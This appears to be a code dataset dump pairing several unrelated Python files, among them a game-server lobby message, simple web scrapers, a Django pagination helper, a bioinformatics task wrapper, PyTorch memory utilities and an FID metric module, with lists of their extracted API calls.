'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor Country"""'}), "(blank=True, max_length=200, verbose_name='Supervisor Country')\n", (7022, 7085), False, 'from django.db import migrations, models\n'), ((7230, 7323), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor County or Parish"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor County or Parish')\n", (7246, 7323), False, 'from django.db import migrations, models\n'), ((7452, 7530), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Supervisor Email"""'}), "(blank=True, max_length=254, verbose_name='Supervisor Email')\n", (7469, 7530), False, 'from django.db import migrations, models\n'), ((7669, 7739), 'django.db.models.CharField', 
'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Supervisor Given Name"""'}), "(max_length=200, verbose_name='Supervisor Given Name')\n", (7685, 7739), False, 'from django.db import migrations, models\n'), ((7879, 7967), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor Middle Name"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor Middle Name')\n", (7895, 7967), False, 'from django.db import migrations, models\n'), ((8102, 8189), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Name Prefix"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Name Prefix')\n", (8118, 8189), False, 'from django.db import migrations, models\n'), ((8324, 8411), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Name Suffix"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Name Suffix')\n", (8340, 8411), False, 'from django.db import migrations, models\n'), ((8540, 8616), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Phone"""'}), "(blank=True, max_length=50, verbose_name='Supervisor Phone')\n", (8556, 8616), False, 'from django.db import migrations, models\n'), ((8762, 8856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor State or Province"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor State or Province')\n", (8778, 8856), False, 'from django.db import migrations, models\n'), ((8987, 9054), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Supervisor Surname"""'}), "(max_length=200, verbose_name='Supervisor Surname')\n", (9003, 9054), False, 'from django.db import 
migrations, models\n'), ((9201, 9300), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Zip Code or Postal Code')\n", (9217, 9300), False, 'from django.db import migrations, models\n'), ((9418, 9472), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Title"""'}), "(max_length=200, verbose_name='Title')\n", (9434, 9472), False, 'from django.db import migrations, models\n')] |
from Logic.Data.DataManager import Writer
from Logic.Client.ClientsManager import ClientsManager
class LobbyInfoMessage(Writer):
    """Server message 23457: online player count plus a version banner."""

    def __init__(self, client, player):
        super().__init__(client)
        self.id = 23457
        self.client = client
        self.player = player

    def encode(self):
        # Payload: connected-client count, banner string, trailing zero varint.
        device = self.player.device
        banner = f"Brawl Stars\nVersion: {device.major}.{device.build}.{device.minor}"
        self.writeVint(ClientsManager.GetCount())
        self.writeString(banner)
        self.writeVint(0)
| [
"Logic.Client.ClientsManager.ClientsManager.GetCount"
] | [((331, 356), 'Logic.Client.ClientsManager.ClientsManager.GetCount', 'ClientsManager.GetCount', ([], {}), '()\n', (354, 356), False, 'from Logic.Client.ClientsManager import ClientsManager\n')] |
from bs4 import BeautifulSoup
import requests
# Fetch DuckDuckGo results for a user-supplied query and print each
# result-snippet <div> found in the returned HTML.
text = input("text : ")
# Bug fix: the original `text.replace(" ", "+")` discarded its result
# (str.replace returns a new string), so it was a no-op.  No manual
# substitution is needed anyway: requests URL-encodes `params` values,
# spaces included.
params = {"q": text}
content = requests.get("https://duckduckgo.com/?q=", params=params)
soup = BeautifulSoup(content.text, 'html.parser')
# Each matching div is one search-result snippet.
for snippet in soup.find_all('div', class_="result__snippet js-result-snippet"):
    print(snippet)
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((126, 183), 'requests.get', 'requests.get', (['"""https://duckduckgo.com/?q="""'], {'params': 'params'}), "('https://duckduckgo.com/?q=', params=params)\n", (138, 183), False, 'import requests\n'), ((191, 233), 'bs4.BeautifulSoup', 'BeautifulSoup', (['content.text', '"""html.parser"""'], {}), "(content.text, 'html.parser')\n", (204, 233), False, 'from bs4 import BeautifulSoup\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import Http404
from infinite_scroll_pagination.paginator import SeekPaginator, EmptyPage
def paginate(request, query_set, lookup_field, per_page=15, page_var='value'):
    """Return a seek-paginated page of *query_set*.

    The request parameter named *page_var* carries the primary key of the
    last object on the previous page; when absent, the first page is
    returned.  Raises ``Http404`` for an unknown pk or an empty page.
    """
    # TODO: remove
    page_pk = request.GET.get(page_var, None)
    paginator = SeekPaginator(query_set, per_page=per_page, lookup_field=lookup_field)
    # No cursor supplied -> first page.
    if page_pk is None:
        return paginator.page()
    model = query_set.model
    try:
        anchor = model.objects.get(pk=page_pk)
    except model.DoesNotExist:
        raise Http404()
    try:
        return paginator.page(value=getattr(anchor, lookup_field), pk=page_pk)
    except EmptyPage:
        raise Http404()
| [
"infinite_scroll_pagination.paginator.SeekPaginator",
"django.http.Http404"
] | [((335, 405), 'infinite_scroll_pagination.paginator.SeekPaginator', 'SeekPaginator', (['query_set'], {'per_page': 'per_page', 'lookup_field': 'lookup_field'}), '(query_set, per_page=per_page, lookup_field=lookup_field)\n', (348, 405), False, 'from infinite_scroll_pagination.paginator import SeekPaginator, EmptyPage\n'), ((599, 608), 'django.http.Http404', 'Http404', ([], {}), '()\n', (606, 608), False, 'from django.http import Http404\n'), ((750, 759), 'django.http.Http404', 'Http404', ([], {}), '()\n', (757, 759), False, 'from django.http import Http404\n')] |
import traceback
from pycompss.api.task import task
from pycompss.api.constraint import constraint
from pycompss.api.parameter import FILE_IN, FILE_OUT
from biobb_common.tools import file_utils as fu
from biobb_md.gromacs_extra import append_ligand
import os
import sys
@constraint(computingUnits="1")
@task(input_top_zip_path=FILE_IN, input_itp_path=FILE_IN,
      output_top_zip_path=FILE_OUT, input_posres_itp_path=FILE_IN,
      on_failure="IGNORE")
def append_ligand_pc(input_top_zip_path, input_itp_path,
                     output_top_zip_path, input_posres_itp_path,
                     properties, **kwargs):
    """PyCOMPSs task wrapper around ``append_ligand.AppendLigand``.

    On any failure the traceback is printed and a placeholder output file
    is written (the task itself is marked ``on_failure="IGNORE"``), so the
    workflow can continue.  stdout/stderr are always flushed on exit.
    """
    try:
        # NOTE(review): PMI_* launcher variables are removed from the
        # environment before launching -- presumably so the wrapped tool
        # does not inherit MPI launcher state; confirm with biobb docs.
        for pmi_var in ('PMI_FD', 'PMI_JOBID', 'PMI_RANK', 'PMI_SIZE'):
            os.environ.pop(pmi_var, None)
        builder = append_ligand.AppendLigand(
            input_top_zip_path=input_top_zip_path,
            input_itp_path=input_itp_path,
            output_top_zip_path=output_top_zip_path,
            input_posres_itp_path=input_posres_itp_path,
            properties=properties, **kwargs)
        builder.launch()
    except Exception:
        traceback.print_exc()
        fu.write_failed_output(output_top_zip_path)
    finally:
        sys.stdout.flush()
        sys.stderr.flush()
"biobb_common.tools.file_utils.write_failed_output",
"pycompss.api.constraint.constraint",
"sys.stderr.flush",
"os.environ.pop",
"biobb_md.gromacs_extra.append_ligand.AppendLigand",
"pycompss.api.task.task",
"sys.stdout.flush",
"traceback.print_exc"
] | [((272, 302), 'pycompss.api.constraint.constraint', 'constraint', ([], {'computingUnits': '"""1"""'}), "(computingUnits='1')\n", (282, 302), False, 'from pycompss.api.constraint import constraint\n'), ((304, 451), 'pycompss.api.task.task', 'task', ([], {'input_top_zip_path': 'FILE_IN', 'input_itp_path': 'FILE_IN', 'output_top_zip_path': 'FILE_OUT', 'input_posres_itp_path': 'FILE_IN', 'on_failure': '"""IGNORE"""'}), "(input_top_zip_path=FILE_IN, input_itp_path=FILE_IN,\n output_top_zip_path=FILE_OUT, input_posres_itp_path=FILE_IN, on_failure\n ='IGNORE')\n", (308, 451), False, 'from pycompss.api.task import task\n'), ((638, 668), 'os.environ.pop', 'os.environ.pop', (['"""PMI_FD"""', 'None'], {}), "('PMI_FD', None)\n", (652, 668), False, 'import os\n'), ((677, 710), 'os.environ.pop', 'os.environ.pop', (['"""PMI_JOBID"""', 'None'], {}), "('PMI_JOBID', None)\n", (691, 710), False, 'import os\n'), ((719, 751), 'os.environ.pop', 'os.environ.pop', (['"""PMI_RANK"""', 'None'], {}), "('PMI_RANK', None)\n", (733, 751), False, 'import os\n'), ((760, 792), 'os.environ.pop', 'os.environ.pop', (['"""PMI_SIZE"""', 'None'], {}), "('PMI_SIZE', None)\n", (774, 792), False, 'import os\n'), ((1221, 1239), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1237, 1239), False, 'import sys\n'), ((1248, 1266), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (1264, 1266), False, 'import sys\n'), ((1126, 1147), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1145, 1147), False, 'import traceback\n'), ((1156, 1199), 'biobb_common.tools.file_utils.write_failed_output', 'fu.write_failed_output', (['output_top_zip_path'], {}), '(output_top_zip_path)\n', (1178, 1199), True, 'from biobb_common.tools import file_utils as fu\n'), ((801, 1029), 'biobb_md.gromacs_extra.append_ligand.AppendLigand', 'append_ligand.AppendLigand', ([], {'input_top_zip_path': 'input_top_zip_path', 'input_itp_path': 'input_itp_path', 'output_top_zip_path': 'output_top_zip_path', 
'input_posres_itp_path': 'input_posres_itp_path', 'properties': 'properties'}), '(input_top_zip_path=input_top_zip_path,\n input_itp_path=input_itp_path, output_top_zip_path=output_top_zip_path,\n input_posres_itp_path=input_posres_itp_path, properties=properties, **\n kwargs)\n', (827, 1029), False, 'from biobb_md.gromacs_extra import append_ligand\n')] |
import requests
import json
from pprint import pprint
import re
import time
import sys
#getdata = requests.get(geturl)
#pprint (vars(getdata))
from bs4 import BeautifulSoup
from geopy.geocoders import Nominatim
# Usage check: the script expects exactly <item> <location> <num items>.
if len(sys.argv) != 4:
    print(sys.argv[0]+" <item> <location> <num items>")
    exit()
#get list of product IDs
item = sys.argv[1].replace(" ","+")  # encode spaces for the query string
print("searching for items with: "+item)
geturl = "http://www.cvs.com/search/N-0?searchTerm="+item+"&navNum="+sys.argv[3]
print("search url: "+geturl)
#This step is important.Converting QString to Ascii for lxml to process
#archive_links = html.fromstring(str(result.toAscii()))
#print archive_links
response = requests.get(geturl)
print(str(response))
page = str(BeautifulSoup(response.content,"html.parser"))
print(page)
# NOTE(review): this unconditional exit() terminates the script here, so the
# scraping/inventory-polling logic defined below never runs -- it looks like a
# debugging leftover that should be removed once the search page parses again.
exit()
def getURL(page):
    """Return the first URL quoted after an "href" occurrence in *page*.

    Returns a tuple ``(url, end_quote)`` where *end_quote* is the index of
    the closing quote, or ``(None, 0)`` when no "href" remains.
    """
    start_link = page.find("href")
    if start_link == -1:
        return None, 0
    start_quote = page.find('"', start_link)
    end_quote = page.find('"', start_quote + 1)
    url = page[start_quote + 1: end_quote]
    return url, end_quote
def getUrls(urls,page):
    """Append every href-quoted URL found in *page* to the list *urls*.

    Iterative rewrite of the original self-recursive scan: a page with
    thousands of links no longer risks hitting Python's recursion limit.
    Scanning stops, as before, at the first missing or empty href value.
    """
    pos = 0
    while True:
        url, n = getURL(page[pos:])
        if not url:
            return
        urls.append(url)
        pos += n
# Collect every href on the search results page.
urls = []
getUrls(urls,page)
for url in urls:
    print(url)
# Extract (item-slug, 6-digit SKU id) pairs from product links, de-duplicated
# by SKU id.
itemlist = []
skuidlist = []
for i in range(0,len(urls)):
    m = re.search('/shop/.*/.*/.*/(.*)-skuid-(\d{6})',urls[i])
    if m and m.group(2) not in skuidlist:
        itemlist.append(m.group(1))
        skuidlist.append(m.group(2))
print("items found:")
for item in itemlist:
    print("\t"+item)
#TODO: now the page loads these in js, so we need to interpret js
exit()
# Geocode the user-supplied location so the inventory endpoint can be queried
# by latitude/longitude.
geolocator = Nominatim()
location = geolocator.geocode(sys.argv[2])
print((location.latitude,location.longitude))
posturl = "http://www.cvs.com/rest/bean/cvs/catalog/CvsBohServiceHandler/storeInventoryValues"
# dicts[i] maps store address -> quantity string for skuidlist[i].
dicts = []
print('loading initial inventory...')
for i in range(0,len(skuidlist)):
    time.sleep(2)  # rate-limit requests to the inventory endpoint
    productId = skuidlist[i]
    postdata = {'productId': productId, 'productSPUlnd': 'true','favstore':'NULL','geolatitude':str(location.latitude),'geolongitude':str(location.longitude)}
    inv = requests.post(posturl,data=postdata)
    # NOTE(review): `dict` shadows the builtin; rename if this block is revived.
    dict = {}
    jsons = inv.json()['atgResponse']
    for j in range(0,len(jsons)):
        temp = jsons[j]
        if(temp['Qty'] == ''):
            temp['Qty'] = '0'  # normalize missing quantities to "0"
        dict[temp['storeAddress']] = temp['Qty']
    dicts.append(dict)
    print(str(100*i/len(skuidlist))+"%")
# Poll forever, reporting quantity drops as "sold" events per store.
while True:
    for j in range(0,len(skuidlist)):
        #delay between requests
        print('3 seconds...')
        time.sleep(3)
        productId = skuidlist[j]
        postdata = {'productId': productId, 'productSPUlnd': 'true','favstore':'NULL','geolatitude':str(location.latitude),'geolongitude':str(location.longitude)}
        inv = requests.post(posturl,data=postdata)
        jsons = inv.json()['atgResponse']
        for i in range(0,len(jsons)):
            temp = jsons[i]
            if(temp['Qty'] == ''):
                temp['Qty'] = '0'
            if(dicts[j][temp['storeAddress']] != temp['Qty']):
                print("was: "+dicts[j][temp['storeAddress']]+" now: "+temp['Qty'])
                sold = int(dicts[j][temp['storeAddress']]) - int(temp['Qty'])
                print(temp['storeAddress']+" sold "+str(sold) + " of item " +itemlist[j])
                dicts[j][temp['storeAddress']] = temp['Qty']
| [
"requests.post",
"geopy.geocoders.Nominatim",
"time.sleep",
"requests.get",
"bs4.BeautifulSoup",
"re.search"
] | [((677, 697), 'requests.get', 'requests.get', (['geturl'], {}), '(geturl)\n', (689, 697), False, 'import requests\n'), ((1625, 1636), 'geopy.geocoders.Nominatim', 'Nominatim', ([], {}), '()\n', (1634, 1636), False, 'from geopy.geocoders import Nominatim\n'), ((731, 777), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""html.parser"""'], {}), "(response.content, 'html.parser')\n", (744, 777), False, 'from bs4 import BeautifulSoup\n'), ((1310, 1366), 're.search', 're.search', (['"""/shop/.*/.*/.*/(.*)-skuid-(\\\\d{6})"""', 'urls[i]'], {}), "('/shop/.*/.*/.*/(.*)-skuid-(\\\\d{6})', urls[i])\n", (1319, 1366), False, 'import re\n'), ((1912, 1925), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1922, 1925), False, 'import time\n'), ((2124, 2161), 'requests.post', 'requests.post', (['posturl'], {'data': 'postdata'}), '(posturl, data=postdata)\n', (2137, 2161), False, 'import requests\n'), ((2542, 2555), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (2552, 2555), False, 'import time\n'), ((2757, 2794), 'requests.post', 'requests.post', (['posturl'], {'data': 'postdata'}), '(posturl, data=postdata)\n', (2770, 2794), False, 'import requests\n')] |
from __future__ import print_function
import numpy as np
from copy import copy
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import torch.nn as nn
def apply_var(v, k):
    """Attach a NaN-checking gradient hook named *k* to *v*.

    Only autograd Variables that require gradients receive a hook;
    every other value is left untouched.
    """
    if not isinstance(v, Variable):
        return
    if v.requires_grad:
        v.register_hook(inves(k))
def apply_dict(dic):
    """Register NaN-checking gradient hooks on every Variable in *dic*.

    For each value, the hook is applied directly, then -- for nn.Module
    values -- to every public attribute and every entry of the module's
    ``_parameters`` mapping, delegating to :func:`apply_var`.
    """
    # .items() works on both Python 2 and 3; the original .iteritems()
    # raises AttributeError under Python 3 (this file already targets both,
    # cf. the __future__ import at the top).
    for k, v in dic.items():
        apply_var(v, k)
        if isinstance(v, nn.Module):
            key_list = [a for a in dir(v) if not a.startswith('__')]
            for key in key_list:
                apply_var(getattr(v, key), key)
            for pk, pv in v._parameters.items():
                apply_var(pv, pk)
def inves(name=''):
    """Build a gradient hook that aborts when *name*'s gradient goes NaN.

    The returned callable passes the tensor through unchanged, but as soon
    as its mean is NaN it prints the offending tensor and raises an
    AssertionError so the faulty backward pass is caught immediately.
    """
    def checker(grad):
        mean_value = torch.mean(grad).data.cpu().numpy()
        if np.isnan(mean_value):
            print('\ngradient of {} :'.format(name))
            print(grad)
            assert 0, 'nan gradient'
        return grad
    return checker
def reduce_sum(inputs, dim=None, keep_dim=False):
    """Sum *inputs*, optionally along *dim*, optionally keeping that axis.

    With ``dim=None`` the whole tensor is reduced to a scalar.  When
    *keep_dim* is true the reduced axis is re-inserted as a singleton
    dimension via :func:`expand_dims`.
    """
    if dim is None:
        return torch.sum(inputs)
    summed = torch.sum(inputs, dim)
    return expand_dims(summed, dim) if keep_dim else summed
def pairwise_add(u, v=None, is_batch=False):
    """Compute all pairwise sums between the entries of two vectors.

    Accepts plain vectors ``(m,)`` and ``(n,)``, or batched vectors
    ``(b, m)`` and ``(b, n)`` when *is_batch* is true.  When *v* is
    omitted, *u* is paired with itself.

    Returns:
        Tensor of shape ``(m, n)``, or ``(b, m, n)`` in batch mode,
        where ``out[..., i, j] = u[..., i] + v[..., j]``.
    """
    u_shape = u.size()
    if v is None:
        v = u
    v_shape = v.size()
    if not is_batch and len(u_shape) > 2:
        raise ValueError("Expected at most 2D tensor or 3D tensor with batch")
    if not is_batch and len(v_shape) > 2:
        raise ValueError("Expected at most 2D tensor or 3D tensor with batch")
    m = u_shape[1] if is_batch else u_shape[0]
    n = v_shape[1] if is_batch else v_shape[0]
    # Broadcast u to (..., m, n) and v to (..., m, n), then add.
    # (unsqueeze(-1)/unsqueeze(-2) are exactly what the original
    # expand_dims(x, -1)/expand_dims(x, -2) helpers computed.)
    u_col = u.unsqueeze(-1)
    u_target = list(u_col.size())
    u_target[-1] = n
    v_row = v.unsqueeze(-2)
    v_target = list(v_row.size())
    v_target[-2] = m
    return u_col.expand(*u_target) + v_row.expand(*v_target)
def to_device(src, ref):
    """Move *src* onto the CUDA device of *ref*; no-op when *ref* is on CPU."""
    if ref.is_cuda:
        return src.cuda(ref.get_device())
    return src
def cumprod(inputs, dim=1, exclusive=True):
    """Cumulative product along *dim*, modeled on tf.cumprod.

    With ``exclusive=True`` each output slot excludes its own input
    element (the first slot becomes ~1 via the eps-guarded division).
    Plain tensors take the fast torch.cumprod path; autograd Variables
    are handled slot-by-slot so gradients flow through each factor.

    NOTE(review): the fast path's exclusive adjustment divides by
    inputs[0] / inputs[-1], which indexes along axis 0 -- confirm this is
    intended for the default dim=1 on multi-dimensional inputs.
    """
    # https://github.com/tensorflow/tensorflow/blob/master/tensorflow/g3doc/api_docs/python/functions_and_classes/shard0/tf.cumprod.md
    if type(inputs) is not Variable:
        temp = torch.cumprod(inputs, dim)
        if not exclusive:
            return temp
        else:
            # Shift to an exclusive product: divide every slot by the first
            # element; 1e-8 guards against division by zero.
            temp = temp / (inputs[0].expand_as(temp) + 1e-8)
            temp[-1] = temp[-1] / (inputs[-1] + 1e-8)
            return temp
    else:
        shape_ = inputs.size()
        ndim = len(shape_)
        n_slot = shape_[dim]
        # One full-range slice per dimension; per-iteration copies pick out
        # the current and previous slots along *dim*.
        slice_ = [slice(0, None, 1) for _ in range(ndim)]
        results = [[]] * n_slot
        for ind in range(0, n_slot):
            this_slice, last_slice = copy(slice_), copy(slice_)
            this_slice[dim] = ind
            last_slice[dim] = ind - 1
            this_slice = tuple(this_slice)
            last_slice = tuple(last_slice)
            if exclusive:
                if ind > 0:
                    results[ind] = results[ind - 1] * inputs[last_slice]
                else:
                    # First slot of the exclusive product: x / (x + eps) ~= 1.
                    results[ind] = torch.div(
                        inputs[this_slice], inputs[this_slice] + 1e-8)
            else:
                if ind > 0:
                    results[ind] = results[ind - 1] * inputs[this_slice]
                else:
                    results[ind] = inputs[this_slice]
        # Re-assemble the per-slot results back along the reduced axis.
        return torch.stack(results, dim)
def expand_dims(input, axis=0):
    """Insert a singleton dimension into *input* at position *axis*.

    Negative axes count from the end in the numpy.expand_dims sense:
    ``axis=-1`` appends a trailing dimension.
    """
    shape = list(input.size())
    insert_at = axis if axis >= 0 else len(shape) + axis + 1
    shape.insert(insert_at, 1)
    return input.view(*shape)
def matmal(left, right):
    '''
    Batched matrix multiplication -- NOT IMPLEMENTED.

    Intended contract (from the original sketch):
    left is of size (*N, n1, n2), where N is a list of batch dims;
    right is of size (*M, m1, m2), where M is a list of batch dims.

    NOTE(review): the body is just ``pass``, so callers currently get
    None; remove or implement before use (name also looks like a typo
    for "matmul").
    '''
    pass
def cosine_distance(memory_matrix, cos_keys):
    """Cosine similarity between lookup keys and each memory slot.

    Parameters
    ----------
    memory_matrix: Tensor (batch_size, mem_slot, mem_size)
        the memory matrix to look up in
    cos_keys: Tensor (batch_size, mem_size, number_of_keys)
        the keys to query the memory with

    Returns: Tensor (batch_size, mem_slot, number_of_keys)
        similarity of every key against every memory slot
    """
    eps = 1e-8
    # L2-normalize the slots (along mem_size) and the keys, with an eps
    # guard against zero-norm rows.
    slot_norms = torch.norm(memory_matrix, 2, 2, keepdim=True)
    key_norms = torch.norm(cos_keys, 2, 1, keepdim=True)
    unit_slots = memory_matrix / (slot_norms.expand_as(memory_matrix) + eps)
    unit_keys = cos_keys / (key_norms.expand_as(cos_keys) + eps)
    return torch.bmm(unit_slots, unit_keys)
def softmax(input, axis=1):
    """Apply softmax on *input* along *axis*.

    Works for tensors of any rank by transposing the target axis to the
    last position, flattening to 2D, applying softmax, and transposing
    back.

    Parammeters:
    ----------
    input: Tensor (N*L or rank>2)
    axis: the axis to apply softmax
    Returns: Tensor with softmax applied on that dimension.
    """
    input_size = input.size()
    last = len(input_size) - 1
    trans_input = input.transpose(axis, last)
    trans_size = trans_input.size()
    input_2d = trans_input.contiguous().view(-1, trans_size[-1])
    # Pass dim explicitly: F.softmax without `dim` is deprecated and relies
    # on rank-based guessing.  The flattened input is always 2D, so dim=1 is
    # exactly the axis the implicit rule selected here -- same result, no
    # deprecation warning, future-proof.
    soft_max_2d = F.softmax(input_2d, dim=1)
    soft_max_nd = soft_max_2d.view(*trans_size)
    return soft_max_nd.transpose(axis, last)
| [
"torch.mean",
"torch.stack",
"torch.cumprod",
"torch.norm",
"torch.sum",
"torch.div",
"torch.bmm",
"copy.copy",
"torch.nn.functional.softmax"
] | [((1019, 1041), 'torch.sum', 'torch.sum', (['inputs', 'dim'], {}), '(inputs, dim)\n', (1028, 1041), False, 'import torch\n'), ((4617, 4662), 'torch.norm', 'torch.norm', (['memory_matrix', '(2)', '(2)'], {'keepdim': '(True)'}), '(memory_matrix, 2, 2, keepdim=True)\n', (4627, 4662), False, 'import torch\n'), ((4679, 4719), 'torch.norm', 'torch.norm', (['cos_keys', '(2)', '(1)'], {'keepdim': '(True)'}), '(cos_keys, 2, 1, keepdim=True)\n', (4689, 4719), False, 'import torch\n'), ((4912, 4954), 'torch.bmm', 'torch.bmm', (['normalized_mem', 'normalized_keys'], {}), '(normalized_mem, normalized_keys)\n', (4921, 4954), False, 'import torch\n'), ((5514, 5533), 'torch.nn.functional.softmax', 'F.softmax', (['input_2d'], {}), '(input_2d)\n', (5523, 5533), True, 'import torch.nn.functional as F\n'), ((988, 1005), 'torch.sum', 'torch.sum', (['inputs'], {}), '(inputs)\n', (997, 1005), False, 'import torch\n'), ((2449, 2475), 'torch.cumprod', 'torch.cumprod', (['inputs', 'dim'], {}), '(inputs, dim)\n', (2462, 2475), False, 'import torch\n'), ((3603, 3628), 'torch.stack', 'torch.stack', (['results', 'dim'], {}), '(results, dim)\n', (3614, 3628), False, 'import torch\n'), ((2941, 2953), 'copy.copy', 'copy', (['slice_'], {}), '(slice_)\n', (2945, 2953), False, 'from copy import copy\n'), ((2955, 2967), 'copy.copy', 'copy', (['slice_'], {}), '(slice_)\n', (2959, 2967), False, 'from copy import copy\n'), ((3310, 3367), 'torch.div', 'torch.div', (['inputs[this_slice]', '(inputs[this_slice] + 1e-08)'], {}), '(inputs[this_slice], inputs[this_slice] + 1e-08)\n', (3319, 3367), False, 'import torch\n'), ((706, 724), 'torch.mean', 'torch.mean', (['tensor'], {}), '(tensor)\n', (716, 724), False, 'import torch\n')] |
# Code apapted from https://github.com/mseitzer/pytorch-fid
"""Calculates the Frechet Inception Distance (FID) to evalulate GANs
The FID metric calculates the distance between two distributions of images.
Typically, we have summary statistics (mean & covariance matrix) of one
of these distributions, while the 2nd distribution is given by a GAN.
When run as a stand-alone program, it compares the distribution of
images that are stored as PNG/JPEG at a specified location with a
distribution given by summary statistics (in pickle format).
The FID is calculated by assuming that X_1 and X_2 are the activations of
the pool_3 layer of the inception net for generated samples and real world
samples respectively.
See --help to see further details.
Code apapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead
of Tensorflow
Copyright 2018 Institute of Bioinformatics, JKU Linz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import time
import numpy as np
import torch
from scipy import linalg
from torch.nn.functional import adaptive_avg_pool2d
from util import tools
def get_activations(dataset, model, size=1000, batch_size=50, dims=2048, device='cpu'):
    """Collect Inception pool-3 style activations for *size* samples.

    Runs *model* in eval mode over batches of *dataset* and stores the
    model's first output (spatially average-pooled down to 1x1 when
    needed) into a (size, dims) numpy array.

    Params:
    -- dataset    : torch Dataset yielding (image, label) pairs
    -- model      : instance of the inception model
    -- size       : number of samples to process
    -- batch_size : batch size for inference
    -- dims       : dimensionality of the returned features
    -- device     : device to run calculations on
    """
    model.eval()
    if batch_size > size:
        print(('Warning: batch size is bigger than the data size. '
               'Setting batch size to data size'))
        batch_size = size
    loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, drop_last=False)
    activations = np.empty((size, dims))
    filled = 0
    for images, _ in loader:
        # Grayscale input: replicate the single channel to fake RGB.
        if images.shape[1] == 1:
            images = torch.cat((images, images, images), 1)
        images = images.to(device)
        with torch.no_grad():
            features = model(images)[0]
        # If the model output is not scalar per channel, apply global
        # spatial average pooling (happens for dims != 2048).
        if features.size(2) != 1 or features.size(3) != 1:
            features = adaptive_avg_pool2d(features, output_size=(1, 1))
        features = features.squeeze(3).squeeze(2).cpu().numpy()
        activations[filled:filled + features.shape[0]] = features
        filled += features.shape[0]
        if filled >= size:
            break
    return activations
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
    """Frechet distance between Gaussians N(mu1, C1) and N(mu2, C2).

    d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).

    Falls back to a jittered covariance product (eps added to the
    diagonals) when the plain product is numerically singular, and
    discards negligible imaginary components introduced by the matrix
    square root.
    """
    mu1, mu2 = np.atleast_1d(mu1), np.atleast_1d(mu2)
    sigma1, sigma2 = np.atleast_2d(sigma1), np.atleast_2d(sigma2)
    assert mu1.shape == mu2.shape, 'Training and test mean vectors have different lengths'
    assert sigma1.shape == sigma2.shape, 'Training and test covariances have different dimensions'
    diff = mu1 - mu2
    # sqrtm dominates the runtime, so keep the timing printout.
    t0 = time.time()
    covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
    print("FID: sqrtm --- %s seconds ---" % (time.time() - t0))
    if not np.isfinite(covmean).all():
        msg = ('fid calculation produces singular product; '
               'adding %s to diagonal of cov estimates') % eps
        print(msg)
        offset = np.eye(sigma1.shape[0]) * eps
        covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset))
    # Numerical error can leave a small imaginary component; warn only if
    # it is non-negligible, then keep the real part either way.
    if np.iscomplexobj(covmean):
        if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3):
            m = np.max(np.abs(covmean.imag))
            print('Imaginary component {}'.format(m))
        covmean = covmean.real
    tr_covmean = np.trace(covmean)
    return diff.dot(diff) + np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean
def calculate_activation_statistics(dataset, model, size=1000, batch_size=50, dims=2048):
    """Return the (mean, covariance) summary of inception activations.

    Thin wrapper over :func:`get_activations` that reduces the
    (size, dims) feature matrix to the statistics the FID formula needs.
    """
    features = get_activations(dataset, model, size, batch_size, dims,
                               tools.device_name())
    mean_vec = np.mean(features, axis=0)
    cov_mat = np.cov(features, rowvar=False)
    return mean_vec, cov_mat
| [
"numpy.atleast_2d",
"numpy.trace",
"numpy.mean",
"torch.nn.functional.adaptive_avg_pool2d",
"numpy.eye",
"numpy.abs",
"numpy.diagonal",
"util.tools.device_name",
"numpy.iscomplexobj",
"numpy.empty",
"numpy.isfinite",
"torch.utils.data.DataLoader",
"torch.no_grad",
"numpy.cov",
